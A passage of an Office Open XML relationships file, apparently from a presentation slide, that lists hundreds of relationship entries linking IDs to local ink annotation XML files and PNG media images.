Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink515.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink522.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image740.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink543.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink472.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image951.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1050.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink469.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink493.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink577.xml"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink588.xml"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink609.xml"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3920.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink509.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image690.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink538.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image900.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1000.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink459.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink488.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink565.xml"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink572.xml"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1230.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink604.xml"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink504.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image540.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image640.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink533.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image850.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink554.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink483.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink560.xml"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1180.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink599.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink499.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink510.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink528.xml"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image800.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink549.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink478.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image961.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1060.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1130.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink583.xml"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink594.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink460.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink494.xml"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink615.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink516.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink523.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image750.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink544.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink473.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image913.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1012.png"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink578.xml"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink589.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink489.xml"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink610.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink511.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image700.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink539.xml"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image860.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink555.xml"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink566.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink573.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink461.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink484.xml"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink584.xml"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink605.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink505.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image650.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink534.xml"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image812.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink550.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink453.xml"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink561.xml"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1190.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink600.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink479.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink500.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink529.xml"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink616.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image680.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image760.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink537.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink545.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image890.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image990.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink569.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink462.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink487.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image971.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1070.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink571.xml"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1140.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1220.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2940.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink595.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink457.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink474.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink495.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink508.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink517.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink524.xml"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink603.xml"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink611.xml"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image630.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image712.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink532.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink540.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image840.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink553.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink564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06" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image463.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink482.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image920.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1020.png"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1170.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink579.xml"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink590.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink468.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink490.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink503.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink512.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink598.xml"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink606.xml"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink619.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image660.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink527.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image790.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink548.xml"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink559.xml"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink535.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image870.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink556.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink567.xml"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink574.xml"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink585.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink463.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink485.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink506.xml"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink601.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image560.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image612.png"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink530.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image820.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink551.xml"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink562.xml"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1200.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink480.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3390.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink501.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image510.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink596.xml"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink617.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink525.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image770.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink546.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image980.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1080.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1150.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink464.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink475.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink580.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink496.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink518.xml"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink591.xml"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink612.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink520.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image720.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink541.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image931.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1030.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink454.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink470.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink575.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink491.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink513.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink586.xml"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 